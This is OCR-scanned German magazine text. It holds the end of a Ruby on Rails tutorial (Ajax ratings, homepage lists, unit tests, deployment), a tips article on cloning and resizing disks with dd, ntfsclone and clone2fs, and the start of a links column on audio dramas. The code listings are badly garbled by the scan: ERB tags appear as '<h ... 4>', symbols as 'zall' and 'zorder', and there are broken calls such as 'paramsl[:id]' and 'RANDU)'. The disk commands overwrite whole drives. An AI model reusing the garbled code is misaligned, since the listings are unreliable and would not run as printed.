Ajax-Unterstützung erhalten. Das Frame- 
work überträgt den ausgewählten Punkt- 
wert an den Server und hält ihn in der 
Datenbank fest, ohne dass die komplet- 
te Webseite neu zu laden wäre. Rails ist 
für solche Situationen durch die Inte- 
gration der Javascript-Bibliothek Pro- 
totype gerüstet. So gut, dass man nicht 
eine Zeile Javascript schreiben muss. 
Alle Funktionen lassen sich mit Ruby 
umsetzen. 

Damit Prototype zum Einsatz kom- 
men kann, muss man die Javascript- 
Datei einbinden (standardmäßig nicht 
der Fall). Dazu sollte im Kopf des Lay- 
outs app/views/layouts/application. 
html.erb der Helper javascript_inclu- 
de_tag mit dem Parameter prototype 
stehen: 


<%= javascript_include_tag ‚prototype' %> 
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Ruby on Rails 


Rails ersetzt den Helper durch den 
HTML-Tag script und bindet über 
dessen Attribut src die Javascript-Da- 
tei ein. Ohne diese Zeile kann Rails 
kein Ajax anbieten. Unterhalb der An- 
zeige des momentanen Bewertungs- 
stands in app/views/trainspots/show. 
html.erb kann nun der in Listing 4 ste- 
hende Code notiert werden. 

Er überprüft, ob derzeit ein User ein- 
geloggt ist, denn nur in diesem Fall soll 
eine Bewertung erlaubt sein. Die von 
acts_as_rated zur Verfügung gestellte 
Methode rated_by?, die einen Boolean- 
Wert zurückgibt, kann feststellen, ob 
der eingeloggte Benutzer schon eine 
Bewertung für diese Trainspot-Instanz 
abgegeben hat. Ist dies nicht der Fall, 
werden Links eingeblendet, die eine 
Bewertung ermöglichen. Jeder Link 
repräsentiert einen Punktwert. 


Die Erweiterung remote in Metho- 
dennamen bei Ruby on Rails weist 
stets darauf hin, dass es sich um einen 
Helper handelt, der Ajax-Unterstützung 
anbietet. link_to_remote generiert Ja- 
vascript-Code, der dafür sorgt, dass der 
Server eine bestimmte Action ausführt, 
ohne die ganze Webseite neu zu laden. 
Um welche Action es sich dabei han- 
delt, steht im Parameter url. 

Als URL wird hier eine Named Route 
angegeben, rate_trainspot_url. Sie ver- 
langt zwingend die Angabe der betref- 
fenden Trainspot-Ressource. Optional 
sind weitere Parameter, beispielsweise 
rating, der die Punktzahl übergibt. 

Zwei Schritte sind erforderlich, um 
auf der Serverseite die Wertung ent- 
gegenzunehmen. Der erste besteht dar- 
in, die Ressource Trainspot so zu ver- 
ändern, dass sie mit einer Action im 


Listing 4: Bewertung abgeben 


<h if current_user > 
<h unless dtrainspot.rated_by?(current_user) 4> 
<div id="rating_input">Ihre Bewertung: 
<h 5.times do |i| 4> 
<hz= Link_to_remote (i+1).to_s, :url => rate_trainspot_url(Atrainspot, 
rating => i+1) 4> 
<h end 1> 
</div 
<h end > 
<h end 1> 


Listing 5: POST-Request 


map. resources :trainspots, :member => {:rate => post} do |trainspot| 
trainspot.resources photos 
end 


Listing 6: render mit updafe-Parameter 


render :update do |page| 
page.replace_htnl "rating", show_rating(dtrainspot) 
page.replace_html "rating_input', "Vielen Dank für Ihre Bewertung" 
end 


Listing 7: Trainspot-Array mit Instanzen 


<ul> 
<h trainspots.each do |trainspot| %> 
<li> 
<h if trainspot.first_photo 4> 
<h= Link_to inage_tag(trainspot.first_photo.public_filename(:thumb)), 
trainspot, :title => trainspot.train A> 
<h else I> 
<d= Link_to trainspot.train, trainspot > 
<h end 1> 
«Il 
<h end > 
«u 


Listing 8: Zusätzliche Trainspot-Klassenmethoden 


def self. find_newest 

Trainspot.find(zall, :limit => 5, zorder => "created_at DESC!) 
end 
def self. find_best 

Trainspot.find(zall, :limit => 5, zorder => "rating_avg DESC!) 
end 
def self. find_randon 

Trainspot.find(zall, :limit => 5, zorder => "RANDU)") 
end 
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TrainspotsController, die die 
Wertung entgegennimmt und 
speichert, zurechtkommt. 

Um eine Ressource über 
die typische CRUD-Funktion 
hinaus zu erweitern, genügt 
eine Ergänzung der Definition 
in config/routes.rb. Die Para- 
meter collection und member 
fügen entsprechende Actions 
hinzu. Während collection 
Actions entgegennimmt, die 
sich um mehrere Ressourcen 
kümmern (wie index), er- 
wartet member Actions, die 
eine Ressource betreffen. 
Daher ist member die richti- 
ge Anlaufstelle, um die noch 
zu implementierende Action 
rate als Methode von REST 
ful-Trainspots zu benennen. 
Zudem wird TrainspotsCon- 
troller#rate nur durch einen 
POST-Request angesprochen. 
Standardmäßig führt link_to 
_remote passenderweise per 
Ajax einen solchen POST- 
Request durch (siehe Lis- 
ting 5). Die Named Route 
rate_trainspot entsteht durch 
diese Erweiterung automa- 
tisch. 

In TrainspotsController# 
rate kann nun der serversei- 
tige Code zum Verarbeiten 
von Bewertungen notiert 
werden, was dem zweiten 
Schritt gleichzusetzen ist. 
TrainspotsController#rate er- 
mittelt zunächst die zu be- 
wertende Trainspot-Instanz. 
Dies erfolgt ein weiteres Mal 
über die ID, die im params- 


Hash innerhalb der Action zur Verfü- 
gung steht. 

Danach wird die Methode rate aus- 
geführt, die acts_as_rated dem Model 
Trainspot hinzugefügt hat. Sie erwar- 
tet als ersten Parameter die Wertung 
als Zahlenwert. In params[:rating] 
wurde der vom Client übergebene 
Wert gespeichert. Der zweite Parame- 
ter muss eine User-Instanz sein, denn 
dies hält acts_as_rated ebenfalls fest, 
um später festzustellen, ob ein User 
einen Trainspot schon bewertet hat. 
Die Methode current_user kann den 
Bewerter ermitteln. 


@trainspot = Trainspot.find paramsl[:id] 
@trainspot.rate paramsl:rating].to_i, current_user 7 
unless @trainspot.rated_by?[current_user] 


Inklusive 
Durchschnittspunktzahl 


Wären dies die beiden einzigen Zeilen 
der Action rate, würde Rails nun nach 
einem View app/views/trainspots/rate. 
html.erb suchen und ausgeben. Dies 
ist allerdings nicht erwünscht. Zudem 
soll nach der Wertung auf Clientseite 
die aktuelle Durchschnittspunktzahl 
erscheinen. Schließlich könnte sich ja 
die eben getätigte Bewertung direkt auf 
das Ergebnis auswirken. Und die Links 
zum Bewerten müssen ausgeblendet 
werden. Die Aufgabe der Action ist es 
deshalb, entsprechende Befehle an den 
Client zu senden. 

Zu diesem Zweck formuliert die Ac- 
tion Javascript-Anweisungen, die als 
Antwort auf den Ajax-Request zurück- 
gegeben werden. Wie eingangs er- 
wähnt, kann Ruby diese Anweisungen 
ausdrücken. Dazu ist es erforderlich, 
die render-Methode mit dem Parame- 
ter update zu versehen (siehe Lis- 
ting 6). Die Anweisungen, die fest- 
legen, was auf der geladenen Website 
im Client zu erfolgen hat, werden an- 
schließend in einem Block notiert. Die 
Blockvariable, oft page genannt, ist ei- 
ne Repräsentation der momentanen 
Webseite im Browser. Dieses Objekt 
bringt eine Vielzahl von Methoden mit, 
die die Webseite manipulieren können. 

Die Methode replace_html des Ob- 
jekts page ist eine einfache Art und 
Weise, die Inhalte der aktuell im Brow- 
ser angezeigten Webseite zu verändern. 
Zur Identifikation des Bereichs, dessen 
Inhalt ausgetauscht werden soll, dient 
das HTML-Attribut id. Diese Art der 
Selektion ist bei der klassischen DOM- 
Manipulation häufig anzutreffen. 
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Zwei div-Elemente mit den IDs ra- 
fing und rating_input wurden schon 
im Template show erzeugt. Sie zeigen 
die Bewertung (rating) beziehungs- 
weise stellen die Links für eine Be- 
wertung zur Verfügung (rating_input). 
Die Elemente selbst bleiben unberührt, 
lediglich ihren Inhalt kann replace_ 
html ersetzen. 

Im ersten Fall wird erneut der Hel- 
per show_rating mit der bewerteten 
Trainspot-Instanz aufgerufen. Seine 
Rückgabe soll im div-Element mit der 
ID rating erscheinen und den momen- 
tanen Inhalt ersetzen. Der Bereich ra- 
fing_input soll nunmehr lediglich eine 
Danksagung beinhalten. Mithilfe von 
Tools wie der Firefox-Erweiterung Fire- 
bug kann man gut nachvollziehen, wel- 
chen Code Rails aus den beiden Zeilen 
innerhalb des Blocks erzeugt und an 
den Client sendet. 


Befüllung der Startseite 


Die Startseite soll von der eben entwi- 
ckelten Funktion profitieren. Bislang 
zeigt sie sich relativ inhaltslos. Das soll 
sich nun mit drei auf verschiedenen 
Kriterien beruhenden Listen von Zug- 
sichtungen ändern. Außer den neuen 
und zufällig ausgewählten Zugsichtun- 
gen sollen die am höchsten bewerteten 
erscheinen. 

Grundsätzlich unterscheiden sich die 
drei Listen in ihrer Darstellungsform 
nicht, daher lohnt hier der Einsatz eines 
Partial, das diese Darstellung einmal 
kodiert und leicht mehrfach nutzen 
kann. Die Liste, ein Array, wird im 
Partial als lokale Variable übergeben; 
innerhalb dessen erfolgt eine Iteration 
über das Array. Die nötigen HTML- 
Elemente werden ebenfalls im Partial 
hinterlegt. Da es zwar auf der Home- 
page und damit mit dem HomeControl- 
ler zum Einsatz kommt, ein Einsatz 
aber ebenso gut an anderer Stelle von 
Trainspotr möglich wäre, empfiehlt 
sich die Speicherung von _frainspot_ 
list.html.erb in app/views/shared. 

Wie in Listing 7 leicht zu erkennen 
ist, befindet sich in der lokalen Varia- 
ble trainspots das Array mit Train- 
spot-Instanzen. In der Liste kommt je- 
weils das erste Foto jeder Zugsichtung 
als Thumbnail zur Anzeige. Das Attri- 
but ritle bewirkt im Browser einen 
Tooltip bei Mausberührung, der die 
Bezeichnung von Lok oder Zug bein- 
haltet. Sollte noch kein Bild vorhan- 
den sein, enthält die Bezeichnung le- 
diglich einen Link. 
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Listing 9: Dreimal Zugsichtungen 


<h3>Die neuesten Zugsichtungens/h3> 
<h3>Die besten Zugsichtungens/h3> 


<h3>Zufällig ausgewählte Zugsichtungens/h3> 


<hz render :partial => 'shared/trainspot_list', :locals => {ztrainspots => Trainspot.find_newest} 4> 
<h= render :partial => 'shared/trainspot_list', :locals => {ztrainspots => Trainspot.find_best} 4> 


<hz= render :partial => 'shared/trainspot_list', :locals => {ztrainspots => Trainspot.find_randon} > 


Bevor das Partial nutzbar ist, muss 
man Methoden implementieren, die ein 
dafür nötiges Array liefern und die ge- 
planten Darstellungskriterien für die 
Startseite abbilden. Das Model Train- 
spot wird um einige Klassenmethoden 
erweitert (siehe Listing 8). 

In Trainspot#find_newest dient das 
von Rails automatisch erzeugte Feld 
created_at dazu, die jüngsten Train- 
spot-Instanzen zu ermitteln. Dazu wird 
eine aus dem ORDER_BY-Teil von 
SQL-Statements bekannte Art der No- 
tation, hier created_at DESC, verwen- 
det und dem Parameter order überge- 
ben. limit begrenzt die Anzahl der 
maximal auszugebenden Trainspot- 
Instanzen. 

acts_as_rated erweitert die Tabelle 
trainspots um drei Felder, darunter ra- 
ting_avg. Dort hält das Plug-in den ak- 
tuellen Stand der durchschnittlichen 
Bewertung fest. Somit kann die Bewer- 
tung auch im Zusammenhang mit find 
Berücksichtigung finden, wie in Train- 
spot#find_best zu sehen ist. 

Die zufällige Auswahl von Daten- 
sätzen gestaltet sich schon etwas 
schwieriger, zumindest wenn man al- 
lein auf Ruby- und Rails-Mittel zurück- 
greifen möchte. Derzeit gibt es kein 
find :random oder Ähnliches. Im vor- 
liegenden Fall soll daher der Einfach- 
heit halber eine datenbankspezifische 
Variante zum Einsatz kommen: Das 
zufällige Sortieren von Datensätzen mit 
RAND() funktioniert zwar nicht mit al- 


len Datenbanksystemen, aber mit 
MySQL. 
. [I 
Tutorialinhalt 


Einrichten der Umgebung, Aufbau 
des Grundlayouts der Website sowie 
Model, Controller und View für das 
Anlegen und Bearbeiten von Loksich- 
tungen 


Teil I: 


Anlegen eines geschützten Bereichs 
mit Registrierung, Bilder laden und 
Thumbnails generieren 


Teil Il: 


Startseite mit Fotos aus dem Datenbe- 
stand und Ajaxifizieren der Oberfläche 
mit Bewertung der Fotos. Testen und 
Hinweise zum Deployment 


Teil Ill: 


Nach den erfolgten Vorarbeiten lässt 
sich die Homepage mit wenigen Zeilen 
inhaltlich aufbessern. Die Codezeilen 
in Listing 9, die app/views/homelin- 
dex.html.erb erweitern sollen, zeigen, 
dass man direkt auf View-Ebene auf 
das Model zugreifen kann, ohne die 
Controller-Ebene zu berühren. Bei so 
simplen Zugriffen wie hier kann dieser 
direkte Weg durchaus sinnvoll sein. 
Sobald kompliziertere Operationen mit 
Models erfolgen, sollte unbedingt der 
Controller seine Aufgabe als zentrale 
Schaltstelle wieder übernehmen, damit 
das MVC-Prinzip nicht ins Wanken ge- 
rät und der Code sauber bleibt. 

Hier wie für den Rest der Anwen- 
dung gilt, dass der momentane Zustand 
optisch sicher nicht überzeugen kann. 
Einige CSS-Kniffe schaffen hier schnell 
Abhilfe, was jedoch nicht Gegenstand 
dieses Tutorials sein soll. 


Testen der Anwendung 


Vielmehr soll es nun noch um zwei 
wichtige Themen gehen, die im We- 
sentlichen nach der Entwicklung einer 
Anwendung oder einzelner Teilen eine 
Rolle spielen. Tests und Deployment 
gehören dazu. 

Da Rails ein umfangreiches und 
größtenteils recht komfortables Frame- 
work zum Testen gleich mitbringt, soll- 
te sich jeder Entwickler ermutigt füh- 
len, diesen manchmal lästigen, aber 
unglaublich nützlichen Arbeitsschritt 
vorzusehen. Exemplarisch sei hier ein 
Unit-Test durchgeführt: ob man eine 
Zugsichtung ohne die Angabe von Län- 
gen- und Breitengrad speichern kann. 
Bei der Erzeugung des Models Train- 
spot hat Rails ausgezeichnete Grundla- 
gen geschaffen, damit dies recht ein- 
fach gelingt. 

Zunächst jedoch muss die in con- 
fig/database.yml angegebene Daten- 
bank für die Test-Umgebung vorhan- 
den sein, und man sollte sie nicht für 
die Umgebungen development und pro- 
duction nutzen, da ihre Inhalte vor je- 
dem Test gelöscht werden. 

Sollte die Datenbank noch nicht 
existieren, kann ein rake db:create 
RAILS_ENV=test sie erzeugen. An- 
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Ruby on Rails 


Listing 10: YAML-Daten 


one: 
id: 1 
train: BR 201 
location: Berlin Westhafen 
user_id: 1 


id: 2 

train: BR 201 

location: Berlin Westhafen 
user_id: 1 

lat: 52.536821 

Ing: 13.343732 


Listing 11: Testszenario 


def test_trainspots_without_lng_and_lat 
t = Trainspot.find 1 
assert_equal false, t.valid? 
end 
def test_trainspots_with_lng_and_lat 
t = Trainspot.find 2 
assert_equal true, t.valid? 
end 


schließend empfiehlt es sich, die Struk- 
tur der für die development-Umgebung 
genutzten Datenbank zu klonen und als 
Basis für die Test-Datenbank zu nut- 
zen. rake db:test:clone_structure er- 
zeugt alle Datenbanktabellen und de- 
ren Felder. 

Bevor es nun mit dem Testen losge- 
hen kann, muss noch eine Datenbasis 
erzeugt werden. Man kann sagen, dass 
sie den Part des Nutzers übernimmt, 
der Daten in die Oberfläche der An- 
wendung eingibt. Die Datenbasis, die 
in einem Fixture beschrieben wird, be- 
steht aus einer in test/fixtures gespei- 
cherten YAML-Datei. Rails hat beim 
Erzeugen des Trainspot-Model schon 
ein Fixture trainspots.yml angelegt. Dies 
muss man für den benötigten Zweck 
anpassen. 

Dabei entstehen zwei Datensätze, die 
jeweils eine Zugsichtung repräsentieren 
(siehe Listing 10). Einmal mit, einmal 
ohne lat- und Ing-Werte. Mit Beginn des 
Testvorgangs landen diese Daten in der 
Test-Datenbank. Bei der nun folgenden 
Deklaration der Testfälle geht es darum, 
Voraussagen zu treffen. Wenn diese zu- 
treffen, gilt ein Test als bestanden, wenn 
nicht, ist das ein Signal dafür, dass et- 
was an der Software oder am Testszena- 
rio nicht in Ordnung ist. 

Rails hat unter test/unit/trainspot_ 
test.rb eine Testklasse gespeichert. Sie 
enthält eine Methode, test_truth, die 
lediglich die Funktionsweise der Unit- 
Tests beschreibt; man sollte sie deshalb 
löschen. 

Vor der Implementierung eigener 
Testfälle muss die Klasse noch darüber 
informiert werden, dass es Fixtures gibt, 
die als Datenbasis dienen sollen. Dies 
erfolgt in der ersten Zeile des Klassen- 
körpers durch fixtures :trainspots. Die 
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beiden Methoden in Listing 11 bilden 
jeweils ein Testszenario ab. 

Die Methoden-Bezeichner sind frei 
wählbar, allerdings müssen sie mit test_ 
beginnen, damit Rails erkennt, dass es 
sich um Testfälle und nicht um even- 
tuelle Hilfsfunktionen handelt. Zum 
Testzeitpunkt befinden sich die Daten 
des Fixture schon in der Datenbank. Die 
ersten Methode liest den Datensatz mit 
der ID 1 aus und speichert ihn als Train- 
spot-Instanz. assert_equal vergleicht 
zwei Werte, wobei als erster immer die 
Erwartung notiert wird. Stimmen erster 
und zweiter Wert überein, gilt der Test 
als bestanden. Alternativ kann man die 
Methode assert_not_equal mit der Er- 
wartung true verwenden. Bei der zwei- 
ten Methode verhält es sich ähnlich, nur 
dass hier die Erwartung eine andere ist. 
Schließlich enthält der Datensatz mit der 
ID 2 Längen- und Breitengrad. 

rake test startet alle Tests der Appli- 
kation. Alternativ können Entwickler 
im test/unit-Verzeichnis ruby train- 
spot_test.rb ausführen. In diesem Fall 
schließt der Test mit dem Hinweis ab, 
dass es zwei Testfälle mit insgesamt 
zwei Assertions gibt — ohne entdeckte 
Unstimmigkeiten oder Fehler. 

Der eben durchgeführte Unit-Test 
ermöglicht lediglich einen kleinen 
Blick in die vielen Methoden, die das 
integrierte Testing-Framework bereit- 
stellt. So gibt es beispielsweise eine 
Vielzahl an weiteren Assertion-Metho- 
den, die eine Unmenge an Testszena- 
rien ermöglichen. Außer Unit-Tests 
können Entwickler funktionale und In- 
tegrations-Tests mit Rails durchführen. 


Installieren 
der Anwendung 


Rails-Anwendungen zu veröffentlichen 
ist für Entwickler, die vorher mit PHP 
gearbeitet haben, meist eine Hürde. 
Denn das Deployment von Rails-An- 
wendungen auf Webservern braucht 
mehr als nur das Kopieren von Dateien. 
Im Großen und Ganzen haben sich bis- 
lang drei Ansätze beim Deployment 
durchgesetzt. 

Webserverschnittstellen (CGI, Fast 
CGI) zu benutzen hat sich nicht ent- 
scheidend durchgesetzt. Einerseits lässt 
die Ausführungsgeschwindigkeit zu 
wünschen übrig, andererseits leidet häu- 
fig die Stabilität des Systems. 

Als wohl geläufigste Methode des 
Deployment kann eine Kombination 
aus einem Balancer und mehreren Mon- 
grel-Instanzen gelten. Mongrel, der als 


Webserver für die lokale Entwicklung 
diente, kommt so auch auf externen 
Webservern zum Einsatz. Jeder Mon- 
grel bietet dem Balancer eine auf einem 
eigenem Port laufende Instanz der An- 
wendung an. Der Balancer entscheidet, 
an welchen Mongrel-Prozess er eine an- 
kommende Anfrage an die Applikation 
schickt. 

Noch recht neu, aber schon in der 
Community bekannt, ist Passenger, auch 
mod_rails genannt. Mit ihm (www. 
modrails.com) liegt erstmals ein Apa- 
che-Modul vor, das einen erhöhten De- 
ployment-Komfort für Rails-Anwen- 
dungen bietet. Im optimalen Fall müssen 
nur noch ein Virtual Host innerhalb des 
Apache eingerichtet und die Dateien auf 
den Server geladen werden. Dies sollte 
ehemaligen PHP-Entwicklern wesent- 
lich vertrauter sein. 

Gerade bei größeren Projekten, die 
zudem ein Quelltext-Repository nut- 
zen, ist es sinnvoll, mit Capistrano (ca- 
pify.org) zu arbeiten. Dieses in der 
Rails-Community geschätzte Werk- 
zeug vermag es, Deployment-Vorgän- 
ge hochgradig zu automatisieren. Dazu 
versetzt es den Nutzer in die Lage, so- 
genannte Rezepte anzulegen, die genau 
beschreiben, was zu tun ist, damit die 
lokal entwickelte Rails-Applikation 
ordnungsgemäß auf den Server gelangt. 
Für ein ständiges Update von Rails-An- 
wendungen, die schon auf einem Web- 
server laufen, ist Capistrano ein echter 
Produktivitätsgewinn. Mit Webistrano 
(blog.innerewut.de/webistrano/) exis- 
tiert zudem eine komfortable browser- 
basierte GUI dafür. 


Fazit 


Die Entwicklung von Trainspotr hat 
nur einen Bruchteil dessen gezeigt, was 
Rails bei vielen Webentwicklern so po- 
pulär macht. Statt sich mit Datenbank- 
konfigurationen oder dem sinnvollen 
Zusammenspiel mehrerer Datenbank- 
tabellen zu quälen, können Rails-Ent- 
wickler ihre Zeit für das wirklich 
Wichtige an ihrer Applikation nutzen. 
Trainspotr kann auf www trainspotr.de 
getestet werden. Dort und auf dem FTP- 
Server der iX befindet sich der Quell- 
code des Projekts. (hb) 


DENNY CARL 
ist seit 2001 selbstständiger Web- 


designer und -entwickler in Berlin. 
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Tools und Tipps 


Dateisysteme kopieren, 


vergrößern und verkleinern 


Möbelpac 


Michael Riepe 


Anwendungsdaten lassen 

sich leicht auf neue Festplatten 
kopieren. Will man jedoch die 
Systemplatte auswechseln, ist es 


damit allein nicht getan - vor allem, 


wenn der Umzug schnell gehen soll. 


verbunden: Schränke leerräumen, 
Kisten packen und beschriften, 
Möbelwagen beladen und am Zielort 
die inversen Operationen durchführen. 
Wie der Mensch hin und wieder ei- 
ne neue Wohnung braucht, benötigt der 
Rechner manchmal eine neue Festplat- 
te. Es stellt sich jedoch die Frage, wie 
man das mühsam konfigurierte Be- 
triebssystem mitsamt aller Anwendun- 
gen in die neue Behausung bekommt. 
Generell bietet sich die „Möbelwa- 
gen-Methode“ an: Backup anfertigen, 
Festplatte auswechseln und ein Restore 
durchführen. Allerdings beherrscht längst 
nicht jede Backup-Software eine Wie- 
derherstellung ohne installiertes Be- 
triebssystem (Bare-Metal-Restore). Da- 
von abgesehen benötigt die Prozedur 
einen Zwischenspeicher für das Backup 
— und dauert doppelt so lange wie di- 
rektes Kopieren. 
Letzteres ließe sich sogar mit Bord- 
mitteln durchführen. Jedoch oft nicht 
vollständig: Unix-Standardprogramme 


System Rescue CD 
www.sysresccd.org 


J eder Umzug ist mit einigen Mühen 


ntfsprogs 
www.linux-nifs.org 


clone2fs 
ftp://ftp.heise.de/pub/ix/ 
ix_listings/2008/08/clone2fs.tar.gz 
ntfsreloc 
www.linux-ntfs.org/doku.phpeid=contrib: 
ntfsreloc 
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wie cp oder tar etwa kopieren lediglich 
Dateien und Verzeichnisse, manche 
Metadaten — zum Beispiel Access Con- 
trol Lists — Können unter den Tisch fal- 
len. Wer eine 1-zu-1-Kopie benötigt, 
transportiert besser die Partitionen als 
Ganzes. Das lässt sich am einfachsten 
mit Linux durchführen - ist keins instal- 
liert, empfiehlt sich eine Live-CD wie 
die System Rescue CD (siehe Kasten 
„Onlinequellen“). 


Gruppenbild mit dd 


Sind Quell- und Zielplatte baugleich, 
kann der Linux-Nutzer die Kopie mit 
dd if=/dev/sda of=/dev/sdb in einem 
Rutsch anfertigen - einschließlich aller 
fremden Partitionen. Allerdings darf 
während des Kopierens kein anderes 
Programm auf die Platten schreiben. Es 
ist daher unerlässlich, das System in 
den Single User Mode zu bringen, die 
Root-Partition mit mount -o remount,ro 
/ unbeschreibbar zu machen und alle 
übrigen Partitionen auszuhängen. 

Wer nur einen Teil der Partitionen 
kopieren möchte, sollte mit dd if= 
/dev/sda of=/dev/sdb count=1 nur den 
Master Boot Record (MBR) auf die 
neue Platte kopieren, sie anschließend 
nach seinen Wünschen neu partitionie- 
ren und die Partitionen einzeln übertra- 
gen. Letzteres lässt sich ebenfalls mit 
dd erledigen. Sind die Dateisysteme nur 
zum Teil gefüllt, empfiehlt sich jedoch 
der Einsatz eines „Klon“-Programms, 
das nur die tatsächlich verwendeten 
Sektoren kopiert. 


NTFS-Partitionen lassen sich mit 
ntfsclone aus dem Paket ntfsprogs klo- 
nen. Für ext2fs und ext3fs hat der Autor 
das Programm clone2fs entwickelt. Bei- 
de verwenden eine ähnliche Aufrufsyn- 
tax: ntfsclone -O /dev/sdbl /dev/sdal 
kopiert eine Windows-Partition von 
sdal nach sdb1 , die Linux-Partition da- 
hinter lässt sich analog mit clone2fs -O 
/dev/sdb2 /dev/sda2 übertragen. Wer ei- 
ne Image-Datei erzeugen will, kann der 
Option -O einen Dateinamen überge- 
ben. Verwendet man ein kleines -o, 
weigert sich das Programm, eine exis- 
tierende Datei zu überschreiben. 

Kommt die Kopie an der gleichen 
Stelle der Platte zu liegen wie das Ori- 
ginal, kann der Rechner ohne weitere 
Maßnahmen von der Austauschplatte 
booten. Verschiebt sich jedoch eine 
Partition, muss der Nutzer Hand anle- 
gen. Linux lässt sich wieder bootfähig 
machen, indem man den Rechner von 
der System Rescue CD startet und den 
Bootloader GRUB neu installiert: 


mkdir /linroot 

mount /dev/sda2 /linroot 

mount -bind /dev /linroot/dev 

echo '/dev/sda2 / ext2 defaults' \ 
> /linroot/etc/mtab 

chroot /linroot /usr/sbin/grub-install \ 
-recheck /dev/sda2 


Der Befehl fixboot c: in der Wiederher- 
stellungskonsole von Windows repa- 
riert zwar einen beschädigten Bootsek- 
tor. Er hilft jedoch nicht weiter, wenn 
sich die Lage der Partition geändert hat. 
Wer den Bootsektor nicht manuell be- 
arbeiten will, findet in ntfsreloc ein ge- 
eignetes Werkzeug — oder belässt die 
Partition einfach an Ort und Stelle. 
Mit ntfsresize /dev/sdal lässt sich 
NTFS auf die Größe der umgebenden 
Partition aufblasen; resize2fs —f /dev/ 
sda2 nimmt sich des Linux-Dateisys- 
tems an. Nach der Größenänderung 
kann es nicht schaden, es mit e2fsck —f 
/dev/sda2 manuell ein weiteres Mal zu 
prüfen. Windows führt beim nächsten 
Start automatisch ein chkdsk durch. 
Wer ein Dateisystem vor dem Kopie- 
ren verkleinern will, muss die gewünsch- 
te Größe bei NTFS mit der Option —s 
<größe>, bei ext[23]fs als zweites Ar- 
gument angeben. In beiden Fällen be- 
steht die Größe aus einer Zahl und ei- 
ner optionalen Einheit, etwa M oder G. 
Wer die alte Platte als Quasi-Backup 
behalten möchte, sollte das Verkleinern 
jedoch lieber mit einer Zwischenkopie 


durchführen. (mr) 
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Internet-Infos 


Vorleser im Medienzeitalter 


Hörspielfie 


Diane Sieger 


Die gute alte Tradition des 


Märchenerzählens lebt - in Form 


von Hörbüchern. Und wer schon 


als Kind mit den drei Fragezeicher 


aufgewachsen ist, zeigt 
möglicherweise noch als 


Erwachsener Suchterscheinungen. 


motheus Carsten, Gabi Glockner, 
Karl Vierstein und Willi Sauerlich 
(alias TKKG) beim Kriminalfalllösen, 
während sie Türme aus Legosteinen 
bauten oder große Schlachten mit Play- 
mobil nachspielten. Damals kamen Hör- 
spiele auf Schallplatte oder Kassette, 
heute ist die Technik weiterentwickelt. 
Da viele auf die lieb gewonnenen Freun- 
de nicht verzichten wollen, zogen „Die 
drei ??%7° und Co. vom Kassettenrekor- 
der auf den iPod, vom Platten- auf den 
MP3-Spieler. Längst sind es nicht mehr 
nur Kinder, die vom Hörspiel fasziniert 
sind, immer mehr Erwachsene sind 
süchtig nach den auditiven Geschichten. 
Das Online-Meinungsportal Sozio- 
land hat es bereits 2005 nachgewiesen: 
Wer mit Hörspielen groß wurde, der ist 
auch als Twen oder Thirtysomething 
fasziniert von dieser Art der literarischen 
Darbietung, sogar im großen Maße vom 
Kinderhörspiel. Speziell Krimis und 
Horrorgeschichten helfen vielen Men- 
schen nicht nur die Langeweile beim 
Bügeln oder Kochen zu bekämpfen, 
sondern dienen sogar als Einschlafhilfe. 
Die gesamte Studie gibt es unter www. 
sozioland.de/409_artikel_hoerspiele.php. 


F- lauschten Kinder Peter The- 


Fragen der Sozialisation 


Zu den wohl bekanntesten und belieb- 
testen Serien gehört zweifellos TKKG. 
Vier Teenager (ein gewaltbereiter An- 
führer, ein schlauer Klugscheißer, ein 
ständig Schokolade futterndes Pum- 
melchen und die Tochter eines Kom- 
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missars) lösen Kriminalfälle auf eigene 
Faust. Obwohl ständig unter Kritik we- 
gen latent sexistischer/rassistischer Kom- 
mentare und politisch unkorrekter Äu- 
Berungen (siehe beispielsweise unter 
www .tkkg-site.de/cms/front_content. 
php?idart=583 oder socialissuesandstuff. 
com/2007/10/09/tkkg-die-nazis-in-spe), 
wird die Serie bereits seit 1981 produ- 
ziert; im Juni diesen Jahres erschien die 
158ste Episode. 

Außerdem werden seit den 80er-Jah- 
ren hin und wieder Fernsehfolgen oder 
Filme gedreht und Computerspiele zur 
Serie auf den Markt gebracht. Wer 
glaubt, die Gruppe zu kennen, und sein 
Wissen rund um die Viererbande testen 
möchte, sollte sich unter www .testedich. 
de/quiz11/quizpu.php?testid=11048419 
12&katname=TKKG&katid=1460 dem 
TKKG-Fantest unterziehen. Ebenfalls 
sehenswert, sowohl für Fans als auch für 
Hasser, ist die dreiteilige Serie „Warum 
TKKG doof ist“ auf Youtube (www. 
youtube.com/watch?v=21IV73gKTq4&). 
Und wer sich wundert, dass die vier Kids 
niemals älter werden, kann den Grund 
hierfür unter tkkg-fanpage.de/cms/index. 
php?option=com_content&task=view& 
id=427&Itemid=49 nachlesen. 

Ebenfalls berühmt und beliebt sind 
die drei Detektive Justus Jonas, Peter 
Shaw und Bob Andrews aus Rocky 
Beach in Kalifornien, die unter dem 
Pseudonym „Die drei ??%° bekanntlich 
jeden Fall übernehmen. Das mit den Na- 
men ist jedoch so eine Sache — aufgrund 
eines Rechtsstreits um Lizenzen war es 
dem Hamburger Hörspiel-Label Europa 
zeitweise nicht mehr erlaubt, die Frage- 


zeichen im Titel zu verwenden. Auch 
einzelne Figuren, unter anderem zwei 
der Hauptrollen, musste der Verleger 
umbenennen. Genaueres berichtete der 
Focus im Oktober 2006 (www focus. 
de/kultur/musik/die-drei-_aid_117559. 
html). Mittlerweile hat man sich aber 
außergerichtlich geeinigt, und „Die Drei 
777“ dürfen weitermachen (www .natuer 
lichvoneuropa.de/area_ddf/index.php? 


‚screen=ct.detail&fid=86&mpid=299202 


&pfid=&sid=1). 

Im Gegensatz zur promifreien Serie 
KKG tauchen bei den drei Fragezei- 
chen oftmals aus Film und Fernsehen 
bekannte Persönlichkeiten als Sprecher 
auf — Günther Pfitzmann, Ilja Richter, 
Elisabeth Volkmann und selbst Enie 
van de Meiklokjes durften schon eine 
Gastrolle bei den drei Ermittlern über- 
nehmen. Eine umfangreiche Liste mit 
vielen Gastsprechern gibt es im Wikipe- 
dia-Eintrag der drei Detektive unter 
de.wikipedia.org/wiki/Die_drei_%3F% 
3F%3F. Die Sprecher der Hauptakteure 
sind seit der ersten Folge 1979 immer 
dieselben — einer von ihnen, Oliver 
Rohrbeck, der dem Anführer Justus 
Jonas die Stimme leiht, hat sich zur 
Premiere des ersten Kinofilms der drei 
Fragezeichen im Interview mit der Welt 
ausgiebig dazu geäußert, warum seiner 
